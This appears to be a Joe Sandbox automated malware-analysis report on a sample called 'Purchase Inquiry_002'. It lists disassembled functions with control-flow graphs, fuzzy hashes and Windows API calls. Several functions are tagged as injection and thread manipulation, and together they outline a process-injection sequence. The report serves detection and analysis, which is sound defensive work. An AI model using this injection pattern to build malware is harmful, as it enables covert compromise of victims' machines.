                                control_flow_graph 44 6d834b8-6d834e0 45 6d834e2 44->45 46 6d834e7-6d835a3 44->46 45->46 49 6d835a8-6d835b5 46->49 50 6d835a5-6d835cb 46->50 49->50 52 6d83abb-6d83afd 50->52 53 6d835d1-6d835fb 50->53 62 6d83b00-6d83b04 52->62 56 6d83cc8-6d83cd4 53->56 57 6d83601-6d83619 53->57 58 6d83cda-6d83ce3 56->58 57->58 59 6d8361f-6d83620 57->59 63 6d83ce9-6d83cf5 58->63 61 6d83cae-6d83cba 59->61 64 6d83cc0-6d83cc7 61->64 65 6d83625-6d83631 61->65 66 6d83b0a-6d83b10 62->66 67 6d836d6-6d836da 62->67 73 6d83cfb-6d83d07 63->73 71 6d83638-6d83653 65->71 72 6d83633 65->72 66->52 68 6d83b12-6d83b6d 66->68 69 6d836ec-6d836f2 67->69 70 6d836dc-6d836ea 67->70 91 6d83b6f-6d83ba2 68->91 92 6d83ba4-6d83bce 68->92 75 6d83737-6d8373b 69->75 74 6d8374a-6d8377c 70->74 71->63 76 6d83659-6d8367e 71->76 72->71 81 6d83d0d-6d83d14 73->81 97 6d8377e-6d8378a 74->97 98 6d837a6 74->98 77 6d8373d 75->77 78 6d836f4-6d83700 75->78 76->73 90 6d83684-6d83686 76->90 80 6d83740-6d83744 77->80 83 6d83702 78->83 84 6d83707-6d8370f 78->84 80->74 86 6d836bc-6d836d3 80->86 83->84 88 6d83711-6d83725 84->88 89 6d83734 84->89 86->67 94 6d83689-6d83694 88->94 95 6d8372b-6d83732 88->95 89->75 90->94 106 6d83bd7-6d83c56 91->106 92->106 94->81 99 6d8369a-6d836b7 94->99 95->77 101 6d8378c-6d83792 97->101 102 6d83794-6d8379a 97->102 104 6d837ac-6d837d9 98->104 99->80 107 6d837a4 101->107 102->107 111 6d83828-6d838bb 104->111 112 6d837db-6d83813 104->112 119 6d83c5d-6d83c70 106->119 107->104 127 6d838bd 111->127 128 6d838c4-6d838c5 111->128 120 6d83c7f-6d83c84 112->120 119->120 121 6d83c9b-6d83cab 120->121 122 6d83c86-6d83c94 120->122 121->61 122->121 127->128 129 6d83916-6d8391c 128->129 130 6d8391e-6d839e0 129->130 131 6d838c7-6d838e6 129->131 142 6d83a21-6d83a25 130->142 143 6d839e2-6d83a1b 130->143 132 6d838e8 131->132 133 6d838ed-6d83913 131->133 132->133 133->129 144 6d83a66-6d83a6a 142->144 145 6d83a27-6d83a60 142->145 143->142 146 6d83aab-6d83aaf 144->146 147 6d83a6c-6d83aa5 144->147 145->144 146->68 150 6d83ab1-6d83ab9 146->150 147->146 150->62
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: :$~
                                • API String ID: 0-2431124681
                                • Opcode ID: 333afd4e0c7a5a5084c165b3676ec7f73e28fe0bb109bd884547abad8af29dc0
                                • Instruction ID: 6ee93578c28308a3125473ea53af38e625023be0c07b6c3af3eebb992dd0dff6
                                • Opcode Fuzzy Hash: 333afd4e0c7a5a5084c165b3676ec7f73e28fe0bb109bd884547abad8af29dc0
                                • Instruction Fuzzy Hash: DC42F075A00228DFDB59DFA8C984B99BBB2FF48300F1580E9E509AB361D731E991DF50
                                Function 06D82106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 152 6d82106-6d8210a 153 6d8210b-6d82120 152->153 154 6d82acd-6d82adf 152->154 153->154 155 6d82121-6d8212c 153->155 157 6d82132-6d8213e 155->157 158 6d8214a-6d82159 157->158 160 6d821b8-6d821bc 158->160 161 6d821c2-6d821cb 160->161 162 6d82264-6d822ce 160->162 163 6d821d1-6d821e7 161->163 164 6d820c6-6d820d2 161->164 162->154 200 6d822d4-6d8281b 162->200 170 6d82239-6d8224b 163->170 171 6d821e9-6d821ec 163->171 164->154 166 6d820d8-6d820e4 164->166 168 6d8215b-6d82161 166->168 169 6d820e6-6d820fa 166->169 168->154 172 6d82167-6d8217f 168->172 169->168 179 6d820fc-6d82105 169->179 180 6d82a0c-6d82ac2 170->180 181 6d82251-6d82261 170->181 171->154 174 6d821f2-6d8222f 171->174 172->154 183 6d82185-6d821ad 172->183 174->162 197 6d82231-6d82237 174->197 179->152 180->154 183->160 197->170 197->171 278 6d8281d-6d82827 200->278 279 6d82832-6d828c5 200->279 280 6d8282d 278->280 281 6d828d0-6d82963 278->281 279->281 282 6d8296e-6d82a01 280->282 281->282 282->180
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346310866.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d80000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID: D
                                • API String ID: 0-2746444292
                                • Opcode ID: d6500443a58983bfaa749f98179ecaf9f160a562ec90d672b9f7fdd3dd2049e8
                                • Instruction ID: fe75e8d2dfe23fbd30c7907475ac2006c32e7bffc0ff240c5524697011b2b0c3
                                • Opcode Fuzzy Hash: d6500443a58983bfaa749f98179ecaf9f160a562ec90d672b9f7fdd3dd2049e8
                                • Instruction Fuzzy Hash: BA52B874A102298FDB64DF64D898B9EB7B6FF89301F1081D9D549A7390CB30AE81CF91
                                Function 06D96300 Relevance: .4, Instructions: 404COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70b3a1187d983bbbc224968717ebf9bc42332cd1bb94867a07ab8ba17d872959
                                • Instruction ID: 223a2ad89d8a6838ba879210bc534c08783eca67613e566fd27bde8f405564ad
                                • Opcode Fuzzy Hash: 70b3a1187d983bbbc224968717ebf9bc42332cd1bb94867a07ab8ba17d872959
                                • Instruction Fuzzy Hash: 56E1DC74B013448FEBA9DB79C560BAEB7FAAF89700F144469D14ADB390CB35E901CB61
                                Function 06D94801 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8b3ce81e04c604075965a758de7b74401bc1144013aa30d6055792e632398f3
                                • Instruction ID: 2d486c6c69ecd31732d918f191e2c19c99829321fdf324aa62152e3dc0feb443
                                • Opcode Fuzzy Hash: b8b3ce81e04c604075965a758de7b74401bc1144013aa30d6055792e632398f3
                                • Instruction Fuzzy Hash: 0DC0482AE8E01B99AF805C8568010F9E3BCDBCB06AF403062C69EA31124110C22A01F8
                                Function 0281CFF1 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0281D07E
                                • GetCurrentThread.KERNEL32 ref: 0281D0BB
                                • GetCurrentProcess.KERNEL32 ref: 0281D0F8
                                • GetCurrentThreadId.KERNEL32 ref: 0281D151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: b0e4ef8615210305a03f32d58d33d94e3d569575acf0a6f1d1f1ec9e5397fd2d
                                • Instruction ID: f19c61f05dde6577c698446ad580b10701e4774047aa4f53db6914c6f57b0488
                                • Opcode Fuzzy Hash: b0e4ef8615210305a03f32d58d33d94e3d569575acf0a6f1d1f1ec9e5397fd2d
                                • Instruction Fuzzy Hash: 9A5177B4D003498FEB14DFA9D548BAEBBF1EF49304F208459E419A73A0CB75AD44CB66
                                Function 0281D000 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0281D07E
                                • GetCurrentThread.KERNEL32 ref: 0281D0BB
                                • GetCurrentProcess.KERNEL32 ref: 0281D0F8
                                • GetCurrentThreadId.KERNEL32 ref: 0281D151
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: d4b5464657032972b57054f460d529aeb4686a5a20668baa1e386cc774300ab0
                                • Instruction ID: b96d96e09076f47e03e13cca0dd7b3c377a3aba94aabae0fd7e3fd0d08af11b7
                                • Opcode Fuzzy Hash: d4b5464657032972b57054f460d529aeb4686a5a20668baa1e386cc774300ab0
                                • Instruction Fuzzy Hash: E15177B49003498FEB14DFA9D548B9EBBF1EB49304F208459E419A73A0CB75A944CB66
                                Function 06D912C5 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 307 6d912c5-6d91365 310 6d9139e-6d913be 307->310 311 6d91367-6d91371 307->311 318 6d913c0-6d913ca 310->318 319 6d913f7-6d91426 310->319 311->310 312 6d91373-6d91375 311->312 313 6d91398-6d9139b 312->313 314 6d91377-6d91381 312->314 313->310 316 6d91383 314->316 317 6d91385-6d91394 314->317 316->317 317->317 320 6d91396 317->320 318->319 321 6d913cc-6d913ce 318->321 325 6d91428-6d91432 319->325 326 6d9145f-6d91519 CreateProcessA 319->326 320->313 323 6d913f1-6d913f4 321->323 324 6d913d0-6d913da 321->324 323->319 327 6d913dc 324->327 328 6d913de-6d913ed 324->328 325->326 330 6d91434-6d91436 325->330 339 6d9151b-6d91521 326->339 340 6d91522-6d915a8 326->340 327->328 328->328 329 6d913ef 328->329 329->323 331 6d91459-6d9145c 330->331 332 6d91438-6d91442 330->332 331->326 334 6d91444 332->334 335 6d91446-6d91455 332->335 334->335 335->335 337 6d91457 335->337 337->331 339->340 350 6d915b8-6d915bc 340->350 351 6d915aa-6d915ae 340->351 353 6d915cc-6d915d0 350->353 354 6d915be-6d915c2 350->354 351->350 352 6d915b0 351->352 352->350 356 6d915e0-6d915e4 353->356 357 6d915d2-6d915d6 353->357 354->353 355 6d915c4 354->355 355->353 359 6d915f6-6d915fd 356->359 360 6d915e6-6d915ec 356->360 357->356 358 6d915d8 357->358 358->356 361 6d915ff-6d9160e 359->361 362 6d91614 359->362 360->359 361->362 364 6d91615 362->364 364->364
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D91506
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 985f5ab2721b63e77b164279d5456a71160451289334b106315514fc57658223
                                • Instruction ID: 67e15266b1a1452e2af5100627b4b6e5c57454199f94017f10a8afe88d1e3b2c
                                • Opcode Fuzzy Hash: 985f5ab2721b63e77b164279d5456a71160451289334b106315514fc57658223
                                • Instruction Fuzzy Hash: F0A14971D0061A9FEF60DFA8CC41BEDBBB2BF48314F158569D809A7280DB749985CFA1
                                Function 06D912D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 365 6d912d0-6d91365 367 6d9139e-6d913be 365->367 368 6d91367-6d91371 365->368 375 6d913c0-6d913ca 367->375 376 6d913f7-6d91426 367->376 368->367 369 6d91373-6d91375 368->369 370 6d91398-6d9139b 369->370 371 6d91377-6d91381 369->371 370->367 373 6d91383 371->373 374 6d91385-6d91394 371->374 373->374 374->374 377 6d91396 374->377 375->376 378 6d913cc-6d913ce 375->378 382 6d91428-6d91432 376->382 383 6d9145f-6d91519 CreateProcessA 376->383 377->370 380 6d913f1-6d913f4 378->380 381 6d913d0-6d913da 378->381 380->376 384 6d913dc 381->384 385 6d913de-6d913ed 381->385 382->383 387 6d91434-6d91436 382->387 396 6d9151b-6d91521 383->396 397 6d91522-6d915a8 383->397 384->385 385->385 386 6d913ef 385->386 386->380 388 6d91459-6d9145c 387->388 389 6d91438-6d91442 387->389 388->383 391 6d91444 389->391 392 6d91446-6d91455 389->392 391->392 392->392 394 6d91457 392->394 394->388 396->397 407 6d915b8-6d915bc 397->407 408 6d915aa-6d915ae 397->408 410 6d915cc-6d915d0 407->410 411 6d915be-6d915c2 407->411 408->407 409 6d915b0 408->409 409->407 413 6d915e0-6d915e4 410->413 414 6d915d2-6d915d6 410->414 411->410 412 6d915c4 411->412 412->410 416 6d915f6-6d915fd 413->416 417 6d915e6-6d915ec 413->417 414->413 415 6d915d8 414->415 415->413 418 6d915ff-6d9160e 416->418 419 6d91614 416->419 417->416 418->419 421 6d91615 419->421 421->421
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D91506
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 224530f22cf88f73c2203369280e6bbd908a6b40eacb11437bfebc8e4d7f910f
                                • Instruction ID: 581cba48fb858c641729cf9c519d69f2e096031d6d625cb37e1646b64ed241c5
                                • Opcode Fuzzy Hash: 224530f22cf88f73c2203369280e6bbd908a6b40eacb11437bfebc8e4d7f910f
                                • Instruction Fuzzy Hash: 30914971D0061A9FEF60CFA8CC41BEDBBB2BF48314F158569D809A7280DB749985CFA1
                                Function 0281AD68 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 422 281ad68-281ad77 423 281ada3-281ada7 422->423 424 281ad79-281ad86 call 281a08c 422->424 426 281ada9-281adb3 423->426 427 281adbb-281adfc 423->427 429 281ad88 424->429 430 281ad9c 424->430 426->427 433 281ae09-281ae17 427->433 434 281adfe-281ae06 427->434 477 281ad8e call 281aff0 429->477 478 281ad8e call 281b000 429->478 430->423 435 281ae19-281ae1e 433->435 436 281ae3b-281ae3d 433->436 434->433 438 281ae20-281ae27 call 281a098 435->438 439 281ae29 435->439 441 281ae40-281ae47 436->441 437 281ad94-281ad96 437->430 440 281aed8-281af98 437->440 443 281ae2b-281ae39 438->443 439->443 472 281afa0-281afcb GetModuleHandleW 440->472 473 281af9a-281af9d 440->473 444 281ae54-281ae5b 441->444 445 281ae49-281ae51 441->445 443->441 447 281ae68-281ae71 call 281a0a8 444->447 448 281ae5d-281ae65 444->448 445->444 453 281ae73-281ae7b 447->453 454 281ae7e-281ae83 447->454 448->447 453->454 455 281aea1-281aea5 454->455 456 281ae85-281ae8c 454->456 461 281aeab-281aeae 455->461 456->455 458 281ae8e-281ae9e call 281a0b8 call 281a0c8 456->458 458->455 463 281aed1-281aed7 461->463 464 281aeb0-281aece 461->464 464->463 474 281afd4-281afe8 472->474 475 281afcd-281afd3 472->475 473->472 475->474 477->437 478->437
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0281AFBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: e68e79b102966ac80291a3bf0de4817ef0186c0614078dabce6e82187d7b4d3f
                                • Instruction ID: c6afec97d5f78084df0b878a5a3b6b8c2cef54ba728cbf0f2b3098a2a81c1c1b
                                • Opcode Fuzzy Hash: e68e79b102966ac80291a3bf0de4817ef0186c0614078dabce6e82187d7b4d3f
                                • Instruction Fuzzy Hash: 2E7116B8A01B058FDB28DF29D05075AB7F6BF88304F10892DD48AD7B90DB75E949CB91
                                Function 028144B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 479 28144b4-28159d9 CreateActCtxA 482 28159e2-2815a3c 479->482 483 28159db-28159e1 479->483 490 2815a4b-2815a4f 482->490 491 2815a3e-2815a41 482->491 483->482 492 2815a51-2815a5d 490->492 493 2815a60-2815a90 490->493 491->490 492->493 497 2815a42-2815a47 493->497 498 2815a92-2815b14 493->498 497->490
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 028159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b0459eef1d98714b54a47b9d546df1b440cd975e84f4b33f9820b561e4777613
                                • Instruction ID: b52592577fff2d83c115a8b247dc13fd58980522f77552e33af5edf0ed01671a
                                • Opcode Fuzzy Hash: b0459eef1d98714b54a47b9d546df1b440cd975e84f4b33f9820b561e4777613
                                • Instruction Fuzzy Hash: 3841E274C0071DCBEB24DFA9C884B9DBBF5BF88304F60815AD408AB295DBB56949CF90
                                Function 0281590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 501 281590c-28159d9 CreateActCtxA 503 28159e2-2815a3c 501->503 504 28159db-28159e1 501->504 511 2815a4b-2815a4f 503->511 512 2815a3e-2815a41 503->512 504->503 513 2815a51-2815a5d 511->513 514 2815a60-2815a90 511->514 512->511 513->514 518 2815a42-2815a47 514->518 519 2815a92-2815b14 514->519 518->511
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 028159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 0d9e31334e7f3eec97562d4fcc33f34a853e7f8443e14bc730254758c1326098
                                • Instruction ID: 1d103b3f3caf844daece8ae19ae0f19727a9bc7ea48b4322b2c8c117ffccad38
                                • Opcode Fuzzy Hash: 0d9e31334e7f3eec97562d4fcc33f34a853e7f8443e14bc730254758c1326098
                                • Instruction Fuzzy Hash: D841E374C00719CFEB24DFA9C884BCDBBB6BF48304F20815AC418AB291DBB56949CF50
                                Function 06D91040 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 522 6d91040-6d91044 523 6d910a9-6d910e5 WriteProcessMemory 522->523 524 6d91046-6d91096 522->524 528 6d910ee-6d9111e 523->528 529 6d910e7-6d910ed 523->529 530 6d91098-6d910a4 524->530 531 6d910a6 524->531 529->528 530->531 531->523
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D910D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 6d999f5265b5526fffd2adcc34a5c57b624a04e10b85b2ef6a5e7cbf3cdda5b1
                                • Instruction ID: 72d5de7eadc3e9e1a91c822f71880a22d8d9877f234bb0705bddcda84f80bc2e
                                • Opcode Fuzzy Hash: 6d999f5265b5526fffd2adcc34a5c57b624a04e10b85b2ef6a5e7cbf3cdda5b1
                                • Instruction Fuzzy Hash: 552125759003499FDF10DFAAC885BEEBBF5FF48310F108829E959A7240C7799954CB60
                                Function 06D91048 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 535 6d91048-6d91096 537 6d91098-6d910a4 535->537 538 6d910a6-6d910e5 WriteProcessMemory 535->538 537->538 541 6d910ee-6d9111e 538->541 542 6d910e7-6d910ed 538->542 542->541
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D910D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 970e3568102a7c925a45407c9ac2ab99e413f4744efb732bfa5da960770a8186
                                • Instruction ID: 398b0f83cc513c57cb66f32c07206c44c28ba7a467c5d3fd3f9bae9eff67772d
                                • Opcode Fuzzy Hash: 970e3568102a7c925a45407c9ac2ab99e413f4744efb732bfa5da960770a8186
                                • Instruction Fuzzy Hash: E12102759003499FDB10DFAAC884BEEBBF5FB48310F10842AE919A7250C779A954CBA0
                                Function 06D90EA8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 546 6d90ea8-6d90efb 549 6d90f0b-6d90f3b Wow64SetThreadContext 546->549 550 6d90efd-6d90f09 546->550 552 6d90f3d-6d90f43 549->552 553 6d90f44-6d90f74 549->553 550->549 552->553
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D90F2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 970dfd6817fc552eeb0010be4de6d3d2096dacc41a39269e00b72952ab43af5b
                                • Instruction ID: c3a2c22a24e193bcb6c917eff08006d383fbae47470ce791472ea292963ec313
                                • Opcode Fuzzy Hash: 970dfd6817fc552eeb0010be4de6d3d2096dacc41a39269e00b72952ab43af5b
                                • Instruction Fuzzy Hash: D8218C71D043099FDB10CFAAC4857EEBBF5EF48214F14842DD459A7240C7789A85CFA4
                                Function 06D91131 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 557 6d91131-6d911c5 ReadProcessMemory 561 6d911ce-6d911fe 557->561 562 6d911c7-6d911cd 557->562 562->561
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D911B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 8a77d1638b3fbf87c37a4fb1760675248e28ec9b4af58089480a175c9a1dbf75
                                • Instruction ID: 4518bb1398be12c19657d5f4e52ae78cef9c1ddb2d96d8e1d8b86346fb85c812
                                • Opcode Fuzzy Hash: 8a77d1638b3fbf87c37a4fb1760675248e28ec9b4af58089480a175c9a1dbf75
                                • Instruction Fuzzy Hash: EB2134B1D003499FDB10DFAAC880BEEBBF5FF48310F10842AE958A7250C7789940CBA1
                                Function 06D90EB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 566 6d90eb0-6d90efb 568 6d90f0b-6d90f3b Wow64SetThreadContext 566->568 569 6d90efd-6d90f09 566->569 571 6d90f3d-6d90f43 568->571 572 6d90f44-6d90f74 568->572 569->568 571->572
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D90F2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: f4a47fb226c128d7b762bca9f73a61091843f56af9a31a4c26789cb2f6102052
                                • Instruction ID: 516310a1f2a8d9e81c02d62d59fff28348643dc3b37546c1855cef8d496f4a85
                                • Opcode Fuzzy Hash: f4a47fb226c128d7b762bca9f73a61091843f56af9a31a4c26789cb2f6102052
                                • Instruction Fuzzy Hash: 1F211871D003098FDB14DFAAC4857EEBBF5EF48224F14842AD459A7241C778AA45CFA4
                                Function 06D91138 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 576 6d91138-6d911c5 ReadProcessMemory 579 6d911ce-6d911fe 576->579 580 6d911c7-6d911cd 576->580 580->579
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D911B8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1346346963.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d90000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: d67e21911c0b4bd39960cd300c21d0e070d58c3062d60530eea8f10ab81ce8fd
                                • Instruction ID: cb2ca4966a9cda58fbbaf5738386b1641bb7cb19b334f698802798458cf22be6
                                • Opcode Fuzzy Hash: d67e21911c0b4bd39960cd300c21d0e070d58c3062d60530eea8f10ab81ce8fd
                                • Instruction Fuzzy Hash: A12114B1D003499FDB10DFAAC880BEEBBF5FF48310F10842AE919A7250C7799941CBA0
                                Function 0281D650 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0281D6D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 5f0fdf5daeb3202f260e56aee3a82bf58bdace47f6fcb95c62a2a3a329c0c58b
                                • Instruction ID: 82db13acbfc31767844ee0b83067d8332efc2986795745f32d17b9c5f3a3ef38
                                • Opcode Fuzzy Hash: 5f0fdf5daeb3202f260e56aee3a82bf58bdace47f6fcb95c62a2a3a329c0c58b
                                • Instruction Fuzzy Hash: ED21E2B5900308AFDB10CFAAD984BDEBBF9EB48310F14801AE918A7350C374A944CFA4
                                Function 0281D648 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0281D6D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1341136395.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2810000_Purchase Inquiry_002.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 049a65c9ebbec5ce2e1699cd993450f86392f6d08c60f1080cc5c7a70c233e00
                                • Instruction ID: 2acd1c98dfa2b33782f46afec8dd92391975b427c74de614beb36b56b7a37040
                                • Opcode Fuzzy Hash: 049a65c9ebbec5ce2e1699cd993450f86392f6d08c60f1080cc5c7a70c233e00
                                • Instruction Fuzzy Hash: 9921E3B9900209DFDB10CF9AD580BDEBBF5EB48314F14841AE958A7251C374A954CF64
